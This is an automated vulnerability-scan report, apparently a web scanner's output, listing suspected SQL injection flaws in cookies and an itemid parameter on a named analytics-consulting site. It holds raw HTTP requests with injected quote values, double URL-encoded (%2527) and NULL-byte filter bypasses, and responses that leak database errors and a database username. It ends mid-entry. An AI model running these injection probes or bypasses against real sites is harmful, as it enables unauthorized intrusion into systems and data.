GET /blog/55-googleanalytics'/60-ga-extended-segments-part-1.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=30 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:19:56 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/55-googleanalytics''/60-ga-extended-segments-part-1.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=30 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:19:58 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:19:59 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 07:19:59 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 28840
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The __utmmobile cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmmobile cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the __utmmobile cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /blog/55-googleanalytics/60-ga-extended-segments-part-1.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=30 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c%2527;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:14:19 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/55-googleanalytics/60-ga-extended-segments-part-1.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=30 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c%2527%2527;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:14:19 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:14:22 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 07:14:22 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 28830
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The optimizelyEndUserId cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the optimizelyEndUserId cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the optimizelyEndUserId cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /blog/55-googleanalytics/60-ga-extended-segments-part-1.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169%2527; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:03:23 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/55-googleanalytics/60-ga-extended-segments-part-1.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169%2527%2527; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:03:24 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The __utmb cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmb cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/55-googleanalytics/63-kintiskton-llc-in-google-analytics.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=30 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937'; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:11:48 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/55-googleanalytics/63-kintiskton-llc-in-google-analytics.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=30 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937''; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:11:48 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:11:49 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 07:11:50 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 35356
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The __utmz cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmz cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the __utmz cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /blog/55-googleanalytics/63-kintiskton-llc-in-google-analytics.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)%2527; 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:00:15 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/55-googleanalytics/63-kintiskton-llc-in-google-analytics.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)%2527%2527; 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:00:16 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The itemid parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the itemid parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /blog/55-googleanalytics/63-kintiskton-llc-in-google-analytics.html?itemid=70#comment%00' HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=30 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:58:32 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/55-googleanalytics/63-kintiskton-llc-in-google-analytics.html?itemid=70#comment%00'' HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=30 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:58:33 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The __utmmobile cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmmobile cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/55-googleanalytics/68-unobfuscate-gajs-file.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c';
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:07:38 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/55-googleanalytics/68-unobfuscate-gajs-file.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c'';
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:07:40 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:07:41 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 07:07:41 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 21212
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The ki_t cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_t cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/55-googleanalytics/68-unobfuscate-gajs-file.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11'; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:58:04 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/55-googleanalytics/68-unobfuscate-gajs-file.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11''; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:58:06 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The __utma cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utma cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the __utma cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
